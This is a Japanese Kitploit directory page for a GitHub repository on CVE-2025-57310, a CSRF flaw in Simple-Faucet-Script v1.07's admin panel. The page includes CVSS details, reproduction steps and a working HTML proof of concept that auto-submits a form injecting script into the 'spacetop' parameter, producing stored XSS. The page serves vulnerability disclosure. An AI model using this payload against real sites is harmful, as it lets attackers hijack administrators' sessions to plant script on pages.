Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mmakingdom/cve-2025-57310
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07 におけるクロスサイトリクエストフォージェリ (CSRF) の脆弱性。admin.php?p=ads&c=1 への巧妙に細工された POST リクエストを介して、攻撃者が任意のコードを実行できる可能性があります。

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07 には、admin.php?p=ads&c=1 への巧妙に細工された POST リクエストによるクロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在し、攻撃者が任意のコードを実行できる可能性があります。

CWE

CWE-352: クロスサイトリクエストフォージェリ (CSRF)

CVSS v3.1 基本値: 8.8 (高)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

概要

この製品は、管理パネルにおいてクロスサイトリクエストフォージェリ (CSRF) の脆弱性の影響を受けます。認証された管理者が PoC を含む悪意のあるページを訪問すると、CSRF 攻撃によりホームページのコンテンツが不正に変更されます。

再現手順

  1. https://example.com/admin.php に管理者としてログインします。
  2. 以下の PoC を開くと、ホームページにアラートのポップアップが表示されます (格納型 XSS)。
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

影響

攻撃者は spacetop パラメータを介して任意の HTML/JavaScript をホームページに注入でき、格納型クロスサイトスクリプティング (XSS) を引き起こす可能性があります。

クレジット

Muntadhar M. Ahmed (almuntadhar0x01)

ツールをダウンロード